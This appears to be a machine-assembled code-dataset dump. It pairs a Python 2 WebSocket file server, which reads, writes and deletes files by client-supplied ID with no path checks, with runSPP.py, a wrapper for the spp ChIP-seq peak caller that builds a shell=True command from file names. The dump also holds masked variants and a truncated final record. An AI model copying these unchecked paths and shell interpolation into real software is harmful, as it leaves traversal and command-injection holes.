except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
print 'WSYNC was ended successfully!'
self.status = 'ONLINE'
return operation, status, commentary
def status_server(self, user_id, file_id, data):
print "[SERV] Server with %s getting fileserver status..." % (self.transport.getPeer())
status = "C"
operation = "STS"
commentary = self.status
return operation, status, commentary
def onOpen(self):
print "[USER] User with %s connected" % (self.transport.getPeer())
def connectionLost(self, reason):
print '[USER] Lost connection from %s' % (self.transport.getPeer())
def onMessage(self, payload, isBinary):
"""
Processing request from user and send response
"""
user_id, cmd, file_id, self.file_enc_psw = payload[:87].replace('[', '').replace(']', '').split(':')
self.file_enc_psw = self.file_enc_psw.replace('~', '')
data = payload[87:]
operation, status, commentary = "UNK", "C", "Successfull!"
if cmd in ('WRITE_FILE', 'READU_FILE', 'DELET_FILE', 'STATUS_SRV', 'RSYNC_FILE', 'WSYNC_FILE'):
operation, status, commentary = self.commands_handlers[cmd](user_id, file_id, data)
self.file_enc_psw = None
self.sendMessage('[%s][%s]%s' % (operation, status, commentary), isBinary=True, sync=True)
if __name__ == '__main__':
if len(sys.argv) < 3:
print "using python fileserver_client.py [PATH_TO_config.json_FILE] [PORT]"
else:
try:
# read config file
CONFIG_TEMPLATE = sys.argv[1]
with open(CONFIG_TEMPLATE, "r") as f:
CONFIG_DATA = json.load(f)
# checking IP and PORT
CONFIG_PORT = int(sys.argv[2])
except ValueError:
print 'PLEASE, enter correct information about server...'
sys.exit(1)
except Exception, e:
print e
sys.exit(1)
if CONFIG_IP == 'localhost':
CONFIG_IP = '127.0.0.1'
server_addr = "ws://%s:%d" % (CONFIG_IP, CONFIG_PORT)
# create server
factory = WebSocketServerFactory(server_addr)
factory.protocol = MessageBasedServerProtocol
listenWS(factory)
# create special Deffered, which sending our server prefences (ip and port) to main server
if bool(CONFIG_DATA["debug"]) is False:
d = deferLater(reactor, 0, sendPrefences, CONFIG_PORT)
reactor.run()
|
normal
|
{
"blob_id": "30251b7c2ce30b7fa899a5885707c078788d0106",
"index": 1956,
"step-1": "import os\nimport sys\nimport json\nfrom subprocess import Popen, PIPE, STDOUT\n\nfrom twisted.internet.task import deferLater\nfrom twisted.internet import reactor\nfrom autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol, listenWS\n\nfrom utils import rsync\n\n# TODO: Add Twisted logger\n# TODO: Create plugin for fileserver (using twistd)\n# TODO: Thinking about using SSL over my WebSockets message-based protocol (OR using AES algorithm?)\n\nCONFIG_IP = 'localhost'\nCONFIG_PORT = 8888\nCONFIG_TEMPLATE = ''\nCONFIG_DATA = {}\nBATCH_SIZE = 1 * 2 ** 20\n\n\ndef sendPrefences(port):\n p = Popen([\"python\", \"./utils/preferences_sender.py\", str(CONFIG_TEMPLATE), str(port)], stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n result = p.communicate()[0]\n\n\nclass MessageBasedServerProtocol(WebSocketServerProtocol):\n \"\"\"\n Message-based WebSockets server\n Template contains some parts as string:\n [USER_ID:OPERATION_NAME:FILE_ID:FILE_ENC_PASSWORD] - 15 symbols for USER_ID,\n 10 symbols for OPERATION_NAME,\n 25 symbols for FILE_ID\n 32 symbols for FILE_ENC_PASSWORD\n other - some data\n \"\"\"\n\n def __init__(self):\n path = CONFIG_DATA['path']\n base_dir = CONFIG_DATA['base_dir']\n # prepare to working with files...\n if os.path.exists(path) and os.path.isdir(path):\n os.chdir(path)\n if not os.path.exists(base_dir) or not os.path.isdir(base_dir):\n os.mkdir(base_dir)\n os.chdir(base_dir)\n else:\n os.mkdir(path)\n os.chdir(path)\n os.mkdir(base_dir)\n os.chdir(base_dir)\n # init some things\n self.fullpath = path + '/' + base_dir\n self.status = 'ONLINE'\n self.commands_handlers = self.__initHandlersUser()\n self.file_1 = self.file_2 = self.delta_sync = None\n self.file_enc_psw = None\n\n def __initHandlersUser(self):\n \"\"\"\n Initialize handlers for every command\n \"\"\"\n handlers = {}\n handlers['WRITE_FILE'] = self.write_file\n handlers['READU_FILE'] = self.read_file\n handlers['DELET_FILE'] = self.delete_file\n handlers['STATUS_SRV'] = self.status_server\n handlers['RSYNC_FILE'] = self.rsync_file\n handlers['WSYNC_FILE'] = self.wsync_file\n return handlers\n\n def __checkUserCatalog(self, user_id):\n # prepare to working with files...\n os.chdir(self.fullpath)\n if not os.path.exists(user_id) or not os.path.isdir(user_id):\n os.mkdir(user_id)\n os.chdir(user_id)\n else:\n os.chdir(self.fullpath + '/' + user_id)\n\n def __get_standart_states(self):\n return \"C\", 'Succesfull!'\n\n def write_file(self, user_id, file_id, data):\n print \"[USER] User with %s was write a file...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"WRT\"\n try:\n f = open(file_id, \"wb\")\n f.write(data)\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n finally:\n f.close()\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def read_file(self, user_id, file_id, data):\n print \"[USER] User with %s was read a file...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"REA\"\n try:\n f = open(file_id, \"rb\")\n commentary = f.read()\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n finally:\n f.close()\n 
self.status = 'ONLINE'\n return operation, status, commentary\n\n def delete_file(self, user_id, file_id, data):\n print \"[USER] User with %s was delete a file...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"DEL\"\n try:\n os.remove(file_id)\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def rsync_file(self, user_id, file_id, data):\n print \"[USER] User with %s sync files...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"RSY\"\n try:\n f = open(file_id, \"rb\")\n commentary = f.read()\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def wsync_file(self, user_id, file_id, data):\n print \"[USER] User with %s sync files...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"WRT\"\n try:\n unpatched = open(file_id, \"rb\")\n hashes = rsync.blockchecksums(unpatched)\n\n new_file = file_id + '.new'\n swap_path = file_id + '~'\n with open(swap_path, \"wb\") as out_file:\n out_file.write(data)\n\n patchedfile = open(swap_path, \"rb\")\n delta = rsync.rsyncdelta(patchedfile, hashes)\n\n unpatched.seek(0)\n save_to = open(new_file, \"wb\")\n rsync.patchstream(unpatched, save_to, delta)\n\n save_to.close()\n patchedfile.close()\n unpatched.close()\n\n if os.path.exists(file_id):\n os.remove(file_id)\n\n os.rename(new_file, file_id)\n\n if os.path.exists(swap_path):\n os.remove(swap_path)\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n finally:\n print 'WSYNC was ended successfully!'\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def status_server(self, user_id, file_id, data):\n print \"[SERV] Server with %s getting fileserver status...\" % (self.transport.getPeer())\n status = \"C\"\n operation = \"STS\"\n commentary = self.status\n return operation, status, commentary\n\n def onOpen(self):\n print \"[USER] User with %s connected\" % (self.transport.getPeer())\n\n def connectionLost(self, reason):\n print '[USER] Lost connection from %s' % (self.transport.getPeer())\n\n def onMessage(self, payload, isBinary):\n \"\"\"\n Processing request from user and send response\n \"\"\"\n user_id, cmd, file_id, self.file_enc_psw = payload[:87].replace('[', '').replace(']', '').split(':')\n self.file_enc_psw = self.file_enc_psw.replace('~', '')\n data = payload[87:]\n operation, status, commentary = \"UNK\", \"C\", \"Successfull!\"\n if cmd in ('WRITE_FILE', 'READU_FILE', 'DELET_FILE', 'STATUS_SRV', 'RSYNC_FILE', 'WSYNC_FILE'):\n operation, status, commentary = self.commands_handlers[cmd](user_id, file_id, data)\n self.file_enc_psw = None\n self.sendMessage('[%s][%s]%s' % (operation, status, commentary), isBinary=True, sync=True)\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print \"using python fileserver_client.py [PATH_TO_config.json_FILE] [PORT]\"\n else:\n try:\n # 
read config file\n CONFIG_TEMPLATE = sys.argv[1]\n with open(CONFIG_TEMPLATE, \"r\") as f:\n CONFIG_DATA = json.load(f)\n # checking IP and PORT\n CONFIG_PORT = int(sys.argv[2])\n except ValueError:\n print 'PLEASE, enter correct information about server...'\n sys.exit(1)\n except Exception, e:\n print e\n sys.exit(1)\n if CONFIG_IP == 'localhost':\n CONFIG_IP = '127.0.0.1'\n server_addr = \"ws://%s:%d\" % (CONFIG_IP, CONFIG_PORT)\n # create server\n factory = WebSocketServerFactory(server_addr)\n factory.protocol = MessageBasedServerProtocol\n listenWS(factory)\n # create special Deffered, which sending our server prefences (ip and port) to main server\n if bool(CONFIG_DATA[\"debug\"]) is False:\n d = deferLater(reactor, 0, sendPrefences, CONFIG_PORT)\n reactor.run()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
'''
runSPP.py - wrap spp peak caller
========================================
:Tags: Python
Purpose
-------
Runs the spp peak caller.
The workflow follows the tutorial at:
http://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html
Usage
-----
Documentation
-------------
Requirements:
* spp >= ?
* snow >= 0.3.13
* bedtools >= 2.21.0
Code
----
'''
import os
import sys
import subprocess
import collections
from cgatcore import experiment as E
from rpy2.robjects import r as R
def bamToBed(infile, outfile):
'''convert bam to bed with bedtools.'''
statement = "bamToBed -i %(infile)s > %(outfile)s" % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement,
cwd=os.getcwd(),
shell=True)
if retcode < 0:
raise OSError("Child was terminated by signal %i: \n%s\n" %
(-retcode, statement))
return outfile
SPPPeak = collections.namedtuple(
"SPPPeak",
"contig unrefined_start unrefined_end strand "
"posterior summit height refined_start refined_end median fdr")
def iteratePeaks(infile):
    '''iterate over spp peaks in infile.'''
for line in infile:
if line.startswith("#"):
continue
if line.startswith("PEAKID\tChrom"):
continue
# skip empty lines
if line.startswith("\n"):
continue
data = line[:-1].split("\t")
if len(data) != 12:
raise ValueError("could not parse line %s" % line)
# I assume these are 1-based coordinates
data[2] = max(int(data[2]) - 1, 0)
# end
data[3] = int(data[3])
# posterior
data[5] = float(data[5])
# summit
data[6] = max(int(data[6]) - 1, 0)
# height
data[7] = int(data[7])
# refined_start
data[8] = max(int(data[8]) - 1, 0)
# end
data[9] = int(data[9])
# median
data[10] = int(data[10])
# qvalue
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-f", "--input-format", dest="input_format",
type="choice",
choices=("bam",),
help="input file format [default=%default].")
parser.add_option("-w", "--window-size", dest="window_size", type="int",
help="window size [default=%default].")
parser.add_option("-c", "--control-filename",
dest="control_filename",
type="string",
help="filename of input/control data in "
"bed format [default=%default].")
parser.add_option("-t", "--threads", dest="threads", type="int",
help="number of threads to use [default=%default].")
parser.add_option("-q", "--fdr-threshold",
dest="fdr_threshold", type="float",
help="fdr threshold [default=%default].")
parser.add_option("-z", "--spp-z-threshold", dest="z_threshold", type="float",
help="z threshold [default=%default].")
parser.add_option("--bin", dest="bin", type="int",
help="bin tags within the specified number "
" of basepairs to speed up calculation;"
" increasing bin size decreases the accuracy "
"of the determined parameters [default=%default]")
parser.add_option("--spp-srange-min", dest="srange_min", type="float",
help="srange gives the possible range for the "
" size of the protected region;"
" srange should be higher than tag length; "
" making the upper boundary too high"
" will increase calculation time [%default]")
parser.add_option("--spp-srange-max", dest="srange_max", type="float",
help="srange gives the possible range for the "
" size of the protected region;"
" srange should be higher than tag length; "
" making the upper boundary too high"
" will increase calculation time [%default]")
parser.set_defaults(
input_format="bam",
threads=1,
fdr_threshold=0.05,
window_size=1000,
offset=125,
srange_min=50,
srange_max=500,
bin=5,
z_threshold=3,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
"please specify a filename with sample data and an output file")
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
    # load the spp and snow R packages
R.library('spp')
R.library('snow')
# read data
E.info("reading data")
R('''chip.data <- read.bam.tags('%s')''' % filename_sample)
R('''input.data <- read.bam.tags('%s')''' % filename_control)
R('''cluster = makeCluster( %i )''' % (options.threads))
E.info("computing binding characteristics")
# get binding info from cross-correlation profile
# srange gives the possible range for the size of the protected region;
# srange should be higher than tag length; making the upper boundary too
# high will increase calculation time
# bin - bin tags within the specified number of basepairs to speed
# up calculation; increasing bin size decreases the accuracy of
# the determined parameters
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R('''binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);''' % locals())
# print out binding peak separation distance
options.stdout.write(
"shift\t%i\n" % R('''binding.characteristics$peak$x''')[0])
##################################################
##################################################
##################################################
E.info("plot cross correlation profile")
# plot cross-correlation profile
R('''pdf(file="%s.crosscorrelation.pdf",width=5,height=5)''' %
filename_output)
R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')
R('''plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");''')
R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')
R('''dev.off();''')
E.info("selecting informative tags based on the binding characteristics")
# select informative tags based on the binding characteristics
R('''chip.data <- select.informative.tags(
chip.data,binding.characteristics);''')
R('''input.data <- select.informative.tags(
input.data,binding.characteristics);''')
E.info("outputting broad peaks")
window_size, z_threshold = options.window_size, options.z_threshold
R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))''' % locals())
# write out in broadPeak format
R('''write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")''' %
filename_output)
# binding detection parameters desired FDR (1%). Alternatively, an
# E-value can be supplied to the method calls below instead of the
# fdr parameter the binding.characteristics contains the optimized
# half-size for binding detection window
R('''detection.window.halfsize <- binding.characteristics$whs;''')
# determine binding positions using wtd method
E.info("determining binding positions using wtd method")
fdr = options.fdr_threshold
R('''bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())
options.stdout.write("detected_peaks\t%i\n" % R(
'''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])
# output detected binding positions
R('''output.binding.results(bp,"%s.summit.txt");''' % filename_output)
R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())
# output using narrowPeak format
R('''write.narrowpeak.binding(bp,"%s.narrowpeak.txt")''' %
filename_output)
# write footer and output benchmark information.
E.stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
normal
|
{
"blob_id": "e886b88a0b7e8c06772fe8a9554cab1bfe9e94a7",
"index": 7208,
"step-1": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % 
options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % 
options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
"step-3": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\nSPPPeak = collections.namedtuple('SPPPeak',\n 'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'\n )\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- 
